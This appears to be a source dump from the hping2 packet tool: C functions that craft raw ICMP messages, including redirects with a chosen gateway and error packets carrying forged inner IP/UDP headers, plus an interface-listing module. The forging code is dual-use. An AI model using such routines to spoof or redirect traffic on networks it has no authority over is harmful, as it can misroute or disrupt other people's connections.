pkt in delaytable */ 143 | if (opt_icmptype == ICMP_TIMESTAMP) 144 | delaytable_add(_icmp_seq, 0, time(NULL), get_usec(), S_SENT); 145 | 146 | /* send packet */ 147 | send_ip_handler(packet, ICMPHDR_SIZE + sizeof(struct icmp_tstamp_data)); 148 | free (packet); 149 | 150 | _icmp_seq++; 151 | } 152 | 153 | void send_icmp_address(void) 154 | { 155 | char *packet; 156 | struct myicmphdr *icmp; 157 | 158 | packet = malloc(ICMPHDR_SIZE + 4); 159 | if (packet == NULL) { 160 | perror("[send_icmp] malloc"); 161 | return; 162 | } 163 | 164 | memset(packet, 0, ICMPHDR_SIZE + 4); 165 | 166 | icmp = (struct myicmphdr*) packet; 167 | 168 | /* fill icmp hdr */ 169 | icmp->type = opt_icmptype; /* echo replay or echo request */ 170 | icmp->code = 0; 171 | icmp->checksum = 0; 172 | icmp->un.echo.id = getpid() & 0xffff; 173 | icmp->un.echo.sequence = _icmp_seq; 174 | memset(packet+ICMPHDR_SIZE, 0, 4); 175 | 176 | /* icmp checksum */ 177 | if (icmp_cksum == -1) 178 | icmp->checksum = cksum((u_short*)packet, ICMPHDR_SIZE + 4); 179 | else 180 | icmp->checksum = icmp_cksum; 181 | 182 | /* adds this pkt in delaytable */ 183 | if (opt_icmptype == ICMP_TIMESTAMP) 184 | delaytable_add(_icmp_seq, 0, time(NULL), get_usec(), S_SENT); 185 | 186 | /* send packet */ 187 | send_ip_handler(packet, ICMPHDR_SIZE + 4); 188 | free (packet); 189 | 190 | _icmp_seq++; 191 | } 192 | 193 | void send_icmp_other(void) 194 | { 195 | char *packet, *data, *ph_buf; 196 | struct myicmphdr *icmp; 197 | struct myiphdr icmp_ip; 198 | struct myudphdr *icmp_udp; 199 | int udp_data_len = 0; 200 | struct pseudohdr *pseudoheader; 201 | int left_space = IPHDR_SIZE + UDPHDR_SIZE + data_size; 202 | 203 | packet = malloc(ICMPHDR_SIZE + IPHDR_SIZE + UDPHDR_SIZE + data_size); 204 | ph_buf = malloc(PSEUDOHDR_SIZE + UDPHDR_SIZE + udp_data_len); 205 | if (packet == NULL || ph_buf == NULL) { 206 | perror("[send_icmp] malloc"); 207 | return; 208 | } 209 | 210 | memset(packet, 0, ICMPHDR_SIZE + IPHDR_SIZE + UDPHDR_SIZE + data_size); 211 | memset(ph_buf, 0, PSEUDOHDR_SIZE + UDPHDR_SIZE + udp_data_len); 212 | 213 | icmp = (struct myicmphdr*) packet; 214 | data = packet + ICMPHDR_SIZE; 215 | pseudoheader = (struct pseudohdr *) ph_buf; 216 | icmp_udp = (struct myudphdr *) (ph_buf + PSEUDOHDR_SIZE); 217 | 218 | /* fill icmp hdr */ 219 | icmp->type = opt_icmptype; /* ICMP_TIME_EXCEEDED */ 220 | icmp->code = opt_icmpcode; /* should be 0 (TTL) or 1 (FRAGTIME) */ 221 | icmp->checksum = 0; 222 | if (opt_icmptype == ICMP_REDIRECT) 223 | memcpy(&icmp->un.gateway, &icmp_gw.sin_addr.s_addr, 4); 224 | else 225 | icmp->un.gateway = 0; /* not used, MUST be 0 */ 226 | 227 | /* concerned packet headers */ 228 | /* IP header */ 229 | icmp_ip.version = icmp_ip_version; /* 4 */ 230 | icmp_ip.ihl = icmp_ip_ihl; /* IPHDR_SIZE >> 2 */ 231 | icmp_ip.tos = icmp_ip_tos; /* 0 */ 232 | icmp_ip.tot_len = htons((icmp_ip_tot_len ? icmp_ip_tot_len : (icmp_ip_ihl<<2) + UDPHDR_SIZE + udp_data_len)); 233 | icmp_ip.id = htons(getpid() & 0xffff); 234 | icmp_ip.frag_off = 0; /* 0 */ 235 | icmp_ip.ttl = 64; /* 64 */ 236 | icmp_ip.protocol = icmp_ip_protocol; /* 6 (TCP) */ 237 | icmp_ip.check = 0; 238 | memcpy(&icmp_ip.saddr, &icmp_ip_src.sin_addr.s_addr, 4); 239 | memcpy(&icmp_ip.daddr, &icmp_ip_dst.sin_addr.s_addr, 4); 240 | icmp_ip.check = cksum((__u16 *) &icmp_ip, IPHDR_SIZE); 241 | 242 | /* UDP header */ 243 | memcpy(&pseudoheader->saddr, &icmp_ip_src.sin_addr.s_addr, 4); 244 | memcpy(&pseudoheader->daddr, &icmp_ip_dst.sin_addr.s_addr, 4); 245 | pseudoheader->protocol = icmp_ip.protocol; 246 | pseudoheader->lenght = icmp_ip.tot_len; 247 | icmp_udp->uh_sport = htons(icmp_ip_srcport); 248 | icmp_udp->uh_dport = htons(icmp_ip_dstport); 249 | icmp_udp->uh_ulen = htons(UDPHDR_SIZE + udp_data_len); 250 | icmp_udp->uh_sum = cksum((__u16 *) ph_buf, PSEUDOHDR_SIZE + UDPHDR_SIZE + udp_data_len); 251 | 252 | /* filling icmp body with concerned packet header */ 253 | 254 | /* fill IP */ 255 | if (left_space == 0) goto no_space_left; 256 | memcpy(packet+ICMPHDR_SIZE, &icmp_ip, left_space); 257 | left_space -= IPHDR_SIZE; 258 | data += IPHDR_SIZE; 259 | if (left_space <= 0) goto no_space_left; 260 | 261 | /* fill UDP */ 262 | memcpy(packet+ICMPHDR_SIZE+IPHDR_SIZE, icmp_udp, left_space); 263 | left_space -= UDPHDR_SIZE; 264 | data += UDPHDR_SIZE; 265 | if (left_space <= 0) goto no_space_left; 266 | 267 | /* fill DATA */ 268 | data_handler(data, left_space); 269 | no_space_left: 270 | 271 | /* icmp checksum */ 272 | if (icmp_cksum == -1) 273 | icmp->checksum = cksum((u_short*)packet, ICMPHDR_SIZE + IPHDR_SIZE + UDPHDR_SIZE + data_size); 274 | else 275 | icmp->checksum = icmp_cksum; 276 | 277 | /* send packet */ 278 | send_ip_handler(packet, ICMPHDR_SIZE + IPHDR_SIZE + UDPHDR_SIZE + data_size); 279 | free (packet); 280 | free (ph_buf); 281 | } 282 | -------------------------------------------------------------------------------- /interface.c: -------------------------------------------------------------------------------- 1 | /* interfaces.c -- that's getifname.c redone with a decent API. 2 | * This fils is for now used for the TCL bindings but it 3 | * should replace getifname.c at some time. 4 | * 5 | * Note that most of the code comes from getifname.c, so the 6 | * old copyright still apply: 7 | * 8 | * Copyright(C) 1999,2000,2001 Salvatore Sanfilippo 9 | * Copyright(C) 2001 by Nicolas Jombart 10 | * This code is under the GPL license 11 | * 12 | * What changes is the API design that's now sane, the changes 13 | * are Copyright(C) 2003 Salvatore Sanfilippo. 14 | */ 15 | 16 | /* $Id: interface.c,v 1.7 2003/09/08 15:32:40 antirez Exp $ */ 17 | 18 | #ifdef USE_TCL 19 | 20 | #include /* perror */ 21 | #include 22 | #include 23 | #include 24 | #include 25 | #include /* struct sockaddr_in */ 26 | #include /* inet_ntoa */ 27 | #include 28 | #include /* close */ 29 | 30 | #if defined(__FreeBSD__) || defined(__OpenBSD__) || defined(__NetBSD__) || \ 31 | defined(__bsdi__) || defined(__APPLE__) 32 | #include 33 | #include 34 | #include 35 | #include 36 | #endif /* defined(__*BSD__) */ 37 | 38 | #if !defined(__FreeBSD__) && !defined(__OpenBSD__) && !defined(__NetBSD__) && \ 39 | !defined(__linux__) && !defined(__sun__) && !defined(__bsdi__) && \ 40 | !defined(__APPLE__) 41 | #error Sorry, interface code not implemented. 42 | #endif 43 | 44 | #ifdef __sun__ 45 | #include 46 | #include 47 | #include 48 | #endif 49 | 50 | #include "hping2.h" 51 | #include "globals.h" 52 | #include "interface.h" 53 | 54 | /* This function fill the hpingif structures array poited by 'i', 55 | * able to hold up to 'ilen' elements, with details about 56 | * all the interfaces present in the system, with the UP flag set. 57 | * 58 | * The function returns the number of active interfaces found, 59 | * regardless to 'ilen'. So if the returned value is > ilen 60 | * the provided structures array was not enough to hold all 61 | * the interfaces. 62 | * 63 | * On error -1 is returned, and errno set. */ 64 | #if (defined OSTYPE_LINUX) || (defined __sun__) 65 | int hping_get_interfaces(struct hpingif *hif, int ilen) 66 | { 67 | int fd, found = 0, i; 68 | struct ifconf ifc; 69 | struct ifreq ibuf[HPING_IFACE_MAX], ifr; 70 | 71 | /* We need a socket to perform the ioctl()s */ 72 | fd = socket(AF_INET, SOCK_DGRAM, 0); 73 | if (fd == -1) 74 | return -1; 75 | /* Setup the request structure */ 76 | memset(ibuf, 0, sizeof(struct ifreq)*HPING_IFACE_MAX); 77 | ifc.ifc_len = sizeof ibuf; 78 | ifc.ifc_buf = (caddr_t) ibuf; 79 | /* Get a list of interfaces */ 80 | if (ioctl(fd, SIOCGIFCONF, (char*)&ifc) == -1 || 81 | ifc.ifc_len < sizeof(struct ifreq)) 82 | { 83 | close(fd); 84 | return -1; 85 | } 86 | /* Walk the interfaces list, searching for UP interfaces */ 87 | for (i = 0; i < (ifc.ifc_len/sizeof(struct ifreq)); i++) { 88 | struct ifreq *this = ibuf+i; 89 | in_addr_t ifaddr, ifbaddr = 0; 90 | struct sockaddr_in *sain; 91 | int ifloopback, ifmtu, ifptp, ifpromisc, ifbroadcast, ifindex, ifnolink = 0; 92 | 93 | memset(&ifr, 0, sizeof(ifr)); 94 | /* It seems we can avoid to call the ioctl against 95 | * a bogus device with little efforts */ 96 | if (!this->ifr_name[0]) 97 | continue; 98 | strlcpy(ifr.ifr_name, this->ifr_name, HPING_IFNAME_LEN); 99 | /* Get the interface's flags */ 100 | if (ioctl(fd, SIOCGIFFLAGS, (char*)&ifr) == -1) { 101 | /* oops.. failed, continue with the next */ 102 | continue; 103 | } 104 | /* If it's DOWN we are not intersted */ 105 | if (!(ifr.ifr_flags & IFF_UP)) 106 | continue; 107 | ifloopback = (ifr.ifr_flags & IFF_LOOPBACK) != 0; 108 | ifptp = (ifr.ifr_flags & IFF_POINTOPOINT) != 0; 109 | ifpromisc = (ifr.ifr_flags & IFF_PROMISC) != 0; 110 | ifbroadcast = (ifr.ifr_flags & IFF_BROADCAST) != 0; 111 | #ifdef __sun__ 112 | ifindex = -1; 113 | #else 114 | /* Get the interface index */ 115 | if (ioctl(fd, SIOCGIFINDEX, (char*)&ifr) == -1) { 116 | /* oops.. failed, continue with the next */ 117 | continue; 118 | } 119 | ifindex = ifr.ifr_ifindex; 120 | #endif 121 | /* Get the interface address */ 122 | if (ioctl(fd, SIOCGIFADDR, (char*)&ifr) == -1) { 123 | /* oops.. failed, continue with the next */ 124 | continue; 125 | } 126 | sain = (struct sockaddr_in*) &ifr.ifr_addr; 127 | ifaddr = sain->sin_addr.s_addr; 128 | /* Get the interface broadcast address */ 129 | if (ifbroadcast) { 130 | if (ioctl(fd, SIOCGIFBRDADDR, (char*)&ifr) == -1) { 131 | /* oops.. failed, continue with the next */ 132 | continue; 133 | } 134 | sain = (struct sockaddr_in*) &ifr.ifr_broadaddr; 135 | ifbaddr = sain->sin_addr.s_addr; 136 | } 137 | /* Get the interface MTU */ 138 | if (ioctl(fd, SIOCGIFMTU, (char*)&ifr) == -1) { 139 | /* Failed... we wan't consider it fatal */ 140 | ifmtu = 1500; 141 | } 142 | else 143 | { 144 | #ifdef __sun__ 145 | /* somehow solaris is braidamaged in wrt ifr_mtu */ 146 | ifmtu = ifr.ifr_metric; 147 | #else 148 | ifmtu = ifr.ifr_mtu; 149 | #endif 150 | } 151 | #ifdef __linux__ 152 | /* Get the interface link status using MII */ 153 | { 154 | struct mii_data *mii = (struct mii_data*)&ifr.ifr_data; 155 | if (ioctl(fd, SIOCGMIIPHY, (char*)&ifr) != -1) { 156 | int bmsr; 157 | 158 | mii->reg_num = MII_BMSR; 159 | if (ioctl(fd, SIOCGMIIREG, (char*)&ifr) != -1) { 160 | bmsr = mii->val_out; 161 | ifnolink = !(bmsr & MII_BMSR_LINK_VALID); 162 | } 163 | } 164 | } 165 | #endif 166 | /* Finally populate an hpingif entry if there is room */ 167 | if (!ilen) 168 | continue; 169 | strlcpy(hif[found].hif_name, this->ifr_name, HPING_IFNAME_LEN); 170 | hif[found].hif_mtu = ifmtu; 171 | hif[found].hif_loopback = ifloopback; 172 | hif[found].hif_ptp = ifptp; 173 | hif[found].hif_broadcast = ifbroadcast; 174 | hif[found].hif_promisc = ifpromisc; 175 | hif[found].hif_addr[0] = ifaddr; 176 | hif[found].hif_baddr[0] = ifbaddr; 177 | hif[found].hif_naddr = 1; 178 | hif[found].hif_nolink = ifnolink; 179 | /* if_index should be set to -1 if the OS isn't Linux */ 180 | hif[found].hif_index = ifindex; 181 | found++; 182 | ilen--; 183 | } 184 | close(fd); 185 | return found; 186 | } 187 | #endif 188 | 189 | #if defined(__FreeBSD__) || defined(__NetBSD__) || defined(__OpenBSD__) || \ 190 | defined(__bsdi__) || defined(__APPLE__) 191 | /* I wish getifaddrs() API on linux... -- SS */ 192 | int hping_get_interfaces(struct hpingif *hif, int ilen) 193 | { 194 | int found = 0; 195 | struct ifaddrs *ifap, *ifa; 196 | struct if_data *ifdata; 197 | int ifloopback, ifptp, ifpromisc, ifbroadcast, ifnolink; 198 | 199 | /* Get the interfaces list */ 200 | if (getifaddrs(&ifap) == -1) 201 | return -1; 202 | for (ifa = ifap; ifa; ifa = ifa->ifa_next) { 203 | struct ifaddrs *ift; 204 | struct sockaddr_in *sa, *ba; 205 | int naddr = 0; 206 | /* Not interested in DOWN interfaces */ 207 | if (!(ifa->ifa_flags & IFF_UP)) 208 | continue; 209 | ifloopback = (ifa->ifa_flags & IFF_LOOPBACK) != 0; 210 | ifptp = (ifa->ifa_flags & IFF_POINTOPOINT) != 0; 211 | ifpromisc = (ifa->ifa_flags & IFF_PROMISC) != 0; 212 | ifbroadcast = (ifa->ifa_flags & IFF_BROADCAST) != 0; 213 | if (ifa->ifa_addr->sa_family != AF_LINK) 214 | continue; 215 | /* Now search for the AF_INET entry with the same name */ 216 | ift = ifa->ifa_next; 217 | for (; ift; ift = ift->ifa_next) { 218 | if (ift->ifa_addr->sa_family == AF_INET && 219 | ift->ifa_addr && 220 | !strcmp(ifa->ifa_name, ift->ifa_name)) 221 | { 222 | sa = (struct sockaddr_in*) ift->ifa_addr; 223 | ba = (struct sockaddr_in*) ift->ifa_broadaddr; 224 | if (naddr < HPING_IFADDR_MAX) { 225 | hif[found].hif_addr[naddr] = 226 | sa->sin_addr.s_addr; 227 | hif[found].hif_baddr[naddr] = 228 | ba->sin_addr.s_addr; 229 | naddr++; 230 | } 231 | } 232 | } 233 | if (!naddr) 234 | continue; 235 | /* Read the media status */ 236 | { 237 | struct ifmediareq ifmr; 238 | int s = -1; 239 | memset(&ifmr, 0, sizeof(ifmr)); 240 | strncpy(ifmr.ifm_name, ifa->ifa_name, sizeof(ifmr.ifm_name)); 241 | ifnolink = 0; 242 | s = socket(AF_INET, SOCK_DGRAM, 0); 243 | if (s != -1 && 244 | ioctl(s, SIOCGIFMEDIA, (caddr_t)&ifmr) != -1) 245 | { 246 | if (ifmr.ifm_status & IFM_AVALID) { 247 | if (!(ifmr.ifm_status & IFM_ACTIVE)) 248 | ifnolink = 1; 249 | } 250 | } 251 | if (s != -1) 252 | close(s); 253 | } 254 | /* Add the new entry and cotinue */ 255 | ifdata = (struct if_data*) ifa->ifa_data; 256 | strlcpy(hif[found].hif_name, ifa->ifa_name, HPING_IFNAME_LEN); 257 | hif[found].hif_broadcast = ifbroadcast; 258 | hif[found].hif_mtu = ifdata->ifi_mtu; 259 | hif[found].hif_loopback = ifloopback; 260 | hif[found].hif_ptp = ifptp; 261 | hif[found].hif_promisc = ifpromisc; 262 | hif[found].hif_naddr = naddr; 263 | hif[found].hif_nolink = ifnolink; 264 | /* if_index should be set to -1 if the OS isn't Linux */ 265 | hif[found].hif_index = -1; 266 | found++; 267 | ilen--; 268 | if (!ilen) 269 | break; 270 | } 271 | freeifaddrs(ifap); 272 | return found; 273 | } 274 | #endif /* __*BSD__ */ 275 | 276 | /* ------------------------------- test main -------------------------------- */ 277 | #ifdef TESTMAIN 278 | int main(void) 279 | { 280 | struct hpingif ifaces[16]; 281 | int found, i, j; 282 | 283 | found = hping_get_interfaces(ifaces, 16); 284 | printf("Found %d active interfaces:\n", found); 285 | printf("%-10.10s %-16.16s %-10.10s %-10.10s\n", 286 | "NAME", "ADDR", "MTU", "INDEX"); 287 | for (i = 0; i < found; i++) { 288 | struct in_addr ia; 289 | printf("%-10.10s %-10d %-10d", 290 | ifaces[i].hif_name, 291 | ifaces[i].hif_mtu, 292 | ifaces[i].hif_index); 293 | printf("("); 294 | for (j = 0; j < ifaces[i].hif_naddr; j++) { 295 | ia.s_addr = ifaces[i].hif_addr[j]; 296 | printf("%-16.16s ", inet_ntoa(ia)); 297 | } 298 | printf(")"); 299 | if (ifaces[i].hif_broadcast) { 300 | printf("("); 301 | for (j = 0; j < ifaces[i].hif_naddr; j++) { 302 | ia.s_addr = ifaces[i].hif_baddr[j]; 303 | printf("%-16.16s ", inet_ntoa(ia)); 304 | } 305 | printf(")"); 306 | } 307 | if (ifaces[i].hif_loopback) 308 | printf(" LOOPBACK"); 309 | if (ifaces[i].hif_ptp) 310 | printf(" POINTOPOINT"); 311 | if (ifaces[i].hif_promisc) 312 | printf(" PROMISC"); 313 | if (ifaces[i].hif_broadcast) 314 | printf(" BROADCAST"); 315 | if (ifaces[i].hif_nolink) 316 | printf(" NOLINK"); 317 | printf("\n"); 318 | } 319 | return 0; 320 | } 321 | #endif 322 | 323 | #endif /* USE_TCL */ 324 | --------------------------------------------------------------------------------